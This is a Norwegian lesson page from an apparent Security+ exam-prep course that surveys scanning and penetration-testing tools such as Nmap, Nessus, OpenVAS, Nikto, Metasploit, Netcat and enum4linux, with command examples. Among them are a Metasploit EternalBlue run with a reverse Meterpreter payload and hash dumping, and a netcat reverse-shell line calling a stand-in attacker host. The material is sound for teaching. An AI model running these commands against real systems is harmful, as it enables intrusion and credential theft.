Security+ Academy · leksjon

Vanlige skanneverktøy: Nessus, OpenVAS og Nmap

Få praktisk kjennskap til bransjestandardverktøy for å oppdage verter, skanne porter og identifisere sårbarheter.

Leksjon 2 av 413 trinn

Vanlige skanneverktøy: Nessus, OpenVAS og Nmap er en gratis leksjon i Security+ Academy på CoddyKit. Dette er leksjon 2 av 4. Du kan lese valgfritt 3 leksjoner fra denne læringsstien gratis i sin helhet – deretter låser CoddyKit PRO opp alle leksjoner, samt praktisk øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Den er en del av læringsløpet i Security+ Academy, og fremdriften din synkroniseres mellom nettet og CoddyKit-appen. Kurset i Security+ Academy inneholder totalt 4 leksjoner.

Økosystemet av skanneverktøy

Sikkerhetseksperter bruker en rekke skanneverktøy til ulike formål: oppdaging av verter, portskanning, opptelling av tjenester, identifisering av operativsystem, identifisering av sårbarheter og testing av webapplikasjoner. Security+ forventer kjennskap til de mest brukte verktøyene i hver kategori. Når De forstår hva hvert verktøy gjør – og hva det ikke kan gjøre – blir det enklere å velge riktig verktøy til en bestemt oppgave og tolke resultatene korrekt. Resultater fra flere komplementære verktøy gir mer fullstendig dekning enn noe enkeltverktøy alene.

Nmap: nettverkskartleggeren

Nmap (Network Mapper) er det mest brukte verktøyet med åpen kildekode for nettverksoppdaging og sikkerhetsrevisjon. Det kan oppdage aktive verter, kartlegge åpne porter, identifisere kjørende tjenester og versjonene deres samt identifisere operativsystemet. Nmap bruker ulike skanneteknikker, blant annet SYN scan (standardinnstillingen, rask og relativt lite synlig), TCP Connect (fullt håndtrykk, mer støyende, men krever ikke root), UDP scan og version scan. Nmap leveres med Nmap Scripting Engine (NSE), som tilbyr hundrevis av skript for identifisering av sårbarheter, brute-force-angrep og utnyttelse.

# Common Nmap scan types:
nmap -sS 192.168.1.0/24          # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10            # TCP connect scan
nmap -sU -p 53,67,161 target     # UDP scan specific ports
nmap -sV 192.168.1.10            # version detection
nmap -O 192.168.1.10             # OS detection
nmap -A 192.168.1.10             # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10            # scan all 65535 ports
nmap --script vuln 192.168.1.10  # run vulnerability scripts

Nmap-resultater og tolkning

Det er en viktig ferdighet å kunne tolke Nmap-resultater korrekt. Hver linje representerer en port med tilstanden sin (open: en tjeneste lytter, closed: verten svarte, men ingenting lytter, filtered: ingen respons eller ICMP unreachable, sannsynligvis på grunn av en brannmur), protokollen og den identifiserte tjenesten eller versjonen. Åpne porter representerer en mulig angrepsflate. Uventede åpne porter på en vert kan tyde på kompromittering eller uautoriserte tjenester. Flaggene -oN, -oX og -oG lagrer resultatene i formatene normal, XML og grepable – det er avgjørende å lagre resultatene for dokumentasjon og sammenligning av skanninger over tid.

# Sample Nmap output:
# PORT     STATE SERVICE  VERSION
# 22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu
# 80/tcp   open  http     Apache 2.4.41
# 443/tcp  open  ssl/http Apache 2.4.41
# 8080/tcp open  http     Jetty 9.4.39
# 3306/tcp open  mysql    MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)

# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xml

Nessus: sårbarhetsskanner for virksomheter

Nessus (fra Tenable) er den mest utbredte kommersielle sårbarhetsskanneren. Den bruker en plugin-arkitektur med over 100 000 plugin-moduler som dekker CVE-er, konfigurasjonskontroller, samsvarsstandarder (CIS, DISA STIG) og skadevareoppdagelse. Nessus utfører skanning med påloggingsopplysninger ved å logge på systemer med oppgitte opplysninger for å kontrollere installerte programvareversjoner, registernøkler og konfigurasjonsfiler. Dette gir langt mer nøyaktige resultater enn nettverksbasert sondering uten påloggingsopplysninger. Nessus produserer detaljerte rapporter med CVSS-skårer, beskrivelser av sårbarheter og anbefalinger for utbedring. Gratisversjonen Nessus Essentials kan skanne opptil 16 IP-adresser.

# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)

# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High     (CVSS 7.0-8.9):  privilege escalation, severe data exposure
# Medium   (CVSS 4.0-6.9):  local privilege escalation, information disclosure
# Low      (CVSS 0.1-3.9):  minimal impact, hardening issues
# Info:    configuration data, no immediate risk

OpenVAS: sårbarhetsskanning med åpen kildekode

OpenVAS (Open Vulnerability Assessment System) er en gratis sårbarhetsskanner med åpen kildekode som vedlikeholdes av Greenbone Networks. Den er en fellesskapsstøttet videreføring av den opprinnelige Nessus-versjonen fra før den ble kommersiell. OpenVAS bruker NVT-er (Network Vulnerability Tests), som tilsvarer plugin-modulene i Nessus. Greenbone Community Edition (GCE) tilbyr et webbasert administrasjonsgrensesnitt (Greenbone Security Assistant). OpenVAS er populært i miljøer der lisenskostnader hindrer bruk av kommersielle verktøy. Det har et bredere funksjonssett enn Nmap, samtidig som det er gratis, og er derfor et vanlig valg for mindre organisasjoner, akademiske miljøer og sikkerhetslaboratorier.

# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup    # initial setup (takes time to download feeds)
gvm-start    # start OpenVAS services

# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report

# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."

Nikto: sårbarhetsskanner for webservere

Nikto er en skanner med åpen kildekode for webservere som ser etter farlige filer, utdaterte programvareversjoner, problemer med serverkonfigurasjonen og vanlige websårbarheter. Den tester for over 6 700 kjente problemer, blant annet usikre HTTP-metoder, manglende sikkerhetsheadere, eksponerte administratorgrensesnitt, standardpåloggingsopplysninger og vanlige CGI-sårbarheter. Nikto er støyende og er ikke utviklet for å være skjult – den genererer betydelige mengder logger på målet. Den utfyller skannere på nettverksnivå ved å tilby webspesifikke kontroller som Nessus og OpenVAS kanskje ikke dekker i dybden. Bruk alltid Nikto bare på systemer De har autorisasjon til å teste.

# Nikto web scan examples:
nikto -h 192.168.1.10                    # basic scan
nikto -h https://192.168.1.10            # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443      # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html  # save report

# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)

Metasploit Framework

Metasploit Framework er den mest brukte plattformen for penetrasjonstesting og tilbyr en database med exploits, payloads, hjelpe­moduler og verktøy for aktiviteter etter utnyttelse. Kandidater til Security+ bør forstå hva Metasploit er, og hvilken rolle det spiller i en penetrasjonstest, selv om de aldri har brukt det. Metasploit-moduler omfatter: exploits (kode som utnytter en sårbarhet), payloads (shellcode som kjøres etter vellykket utnyttelse, for eksempel Meterpreter), auxiliary modules (skanning, fuzzing og opptelling uten utnyttelse) og post modules (for rettighetseskalering, uthenting av påloggingsopplysninger og sideveis bevegelse etter første tilgang).

# Metasploit Framework basic workflow:
msfconsole                          # start Metasploit
search eternalblue                  # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info                               # show exploit details
set RHOSTS 192.168.1.10            # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5              # attacker IP
run                                # execute exploit

# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump              # dump NTLM hashes

Netcat: den sveitsiske lommekniven

Netcat (nc) er et enkelt, men allsidig verktøy som leser og skriver data over nettverkstilkoblinger ved hjelp av TCP eller UDP. Det har utallige bruksområder innen sikkerhetsarbeid: opprette reverse shells fra kompromitterte verter, overføre filer på tvers av nettverkssegmenter, skanne porter, opprette enkle nettverkslyttere for testing og hente bannere for å identifisere tjenesteversjoner. Det enkle grensesnittet og tilgjengeligheten på nesten alle Linux-systemer gjør det til et ofte brukt verktøy både i legitim administrasjon og i angriperes verktøysett. Derfor er det også viktig å forstå fra et deteksjonsperspektiv.

# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22    # grab SSH banner
nc -v 192.168.1.10 80    # grab HTTP banner

# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded

# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash

# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender:   nc receiver_ip 9999 < file.txt

Recon-ng og OSINT-verktøy

Recon-ng er et rammeverk for rekognosering på nettet, utviklet for innsamling av OSINT (Open Source Intelligence). Det bruker moduler som spør offentlige kilder — Shodan, Bing, HaveIBeenPwned, DNS-poster, LinkedIn, WHOIS og logger for sertifikattransparens — for å samle inn informasjon om et mål før aktiv skanning begynner. Rekognoseringsfasen i en penetrasjonstest starter vanligvis med OSINT for å danne et bilde av målets nettverkstopologi, ansattnavn, e-postformater, teknologier som brukes og offentlig eksponerte ressurser. God OSINT kan avdekke angrepsveier som det ville tatt mye lengre tid å finne gjennom aktiv skanning alene.

# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com

# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com

# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'

# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin

# 5. Certificate transparency:
crt.sh/?q=%.example.com  (reveals subdomains via certs)

Nettverksopplisting med Enum4linux

Enum4linux henter informasjon fra Windows-verter og Samba-servere (Linux SMB) ved hjelp av nulløkter og MSRPC. Det trekker ut brukernavn, gruppemedlemskap, delte ressurser, passordpolicyer og informasjon om arbeidsgrupper. Under interne penetrasjonstester kan enum4linux raskt avdekke hvilke brukerkontoer som er tilgjengelige for passordspraying, samt strukturen til delte ressurser i miljøet. Moderne Windows-versjoner begrenser som standard tilgang via nulløkter, men feilkonfigurerte miljøer eksponerer ofte betydelige mengder informasjon. Tilsvarende funksjonalitet finnes i Impackets samrdump.py og CrackMapExec for autentisert opplisting.

# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10       # all enumeration
enum4linux -U 192.168.1.10       # users only
enum4linux -S 192.168.1.10       # shares only

# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares

# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10

Velg riktig verktøy for oppgaven

Sikkerhetseksperter velger verktøy ut fra oppgaven. For vertsoppdaging og portskanning: Nmap. For identifisering av sårbarheter i stor skala: Nessus (kommersielt) eller OpenVAS (gratis). For sårbarheter i webservere: Nikto. For angrep mot webapplikasjoner: Burp Suite. For utnytting: Metasploit. For OSINT-rekognosering: Recon-ng, theHarvester, Shodan. For analyse av nettverkstrafikk: Wireshark, tcpdump. For trådløse angrep: Aircrack-ng-pakken. Security+-eksamen tester begrepsforståelse av disse verktøyene — De bør vite hva hvert verktøy brukes til, selv uten praktisk erfaring med alle.

Kort kontroll

Test forståelsen Deres av konseptene i CompTIA Security+ (SY0-701) fra denne leksjonen.

Oppsummering av leksjonen

I denne leksjonen lærte De at Nmap er grunnlaget for vertsoppdaging, portskanning og versjonsdeteksjon, med en omfattende skriptmotor for flere funksjoner, at Nessus og OpenVAS utfører omfattende sårbarhetsskanning mot kjente CVE-er og gir størst nøyaktighet ved bruk av autentisert tilgang, og at Metasploit tilbyr et utnyttingsrammeverk som penetrasjonstestere kan bruke til å bekrefte at sårbarheter faktisk kan utnyttes og demonstrere reell konsekvens av et angrep. Neste gang utforsker vi hele livssyklusen for penetrasjonstesting, fra rekognosering til rapportering.

Gratis å komme i gang

Lær deg Security+ Academy med en AI-veileder – gratis

Skriv og kjør ekte kode i nettleseren, få umiddelbar hjelp fra en AI-veileder som er tilgjengelig døgnet rundt, og fortsett der du slapp – på nettet eller i appen.

Kurs
30
Leksjoner
120

Ofte stilte spørsmål

Er leksjonen «Vanlige skanneverktøy: Nessus, OpenVAS og Nmap» gratis?

Ja – du kan lese valgfritt 3 av leksjonene i læringsstien Security+ Academy, inkludert «Vanlige skanneverktøy: Nessus, OpenVAS og Nmap», gratis i sin helhet her på nettet. Deretter låser CoddyKit PRO opp alle leksjoner, samt interaktiv øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Kurset i Security+ Academy inneholder totalt 4 leksjoner.

Hva lærer jeg i «Vanlige skanneverktøy: Nessus, OpenVAS og Nmap»?

Få praktisk kjennskap til bransjestandardverktøy for å oppdage verter, skanne porter og identifisere sårbarheter. Du øver på Security+ Academy med praktisk kode som du kjører direkte i nettleseren, mens en AI-veileder som er tilgjengelig døgnet rundt, svarer på spørsmålene dine mens du jobber deg gjennom leksjonen.

Trenger jeg erfaring for å begynne med Security+ Academy?

Ingen tidligere erfaring er nødvendig. Security+ Academy på CoddyKit er lagt opp for både nybegynnere og viderekomne, så De kan begynne her eller helt fra start og lære i Deres eget tempo. Dette er leksjon 2 av 4.

Hvor lang tid tar leksjonen «Vanlige skanneverktøy: Nessus, OpenVAS og Nmap»?

De fleste CoddyKit-leksjoner tar omtrent 5–10 minutter. Hver leksjon er kort og interaktiv, slik at De gjør jevne fremskritt og kan fortsette akkurat der De slapp – både på nettet og i appen.

Kan jeg skrive og kjøre kode i denne Security+ Academy-leksjonen?

Ja. Alle Security+ Academy-leksjoner har en innebygd kodeeditor, slik at De kan skrive og kjøre ekte kode direkte i nettleseren og få umiddelbar tilbakemelding fra AI – uten lokal konfigurering.

Alle leksjonene i dette kurset

  1. Sårbarhetsskanning kontra penetrasjonstesting
  2. Vanlige skanneverktøy: Nessus, OpenVAS og Nmap
  3. Fasene i penetrasjonstesting: fra rekognosering til rapportering
  4. CVSS-skåring og prioritering av sårbarheter
← Tilbake til Security+ Academy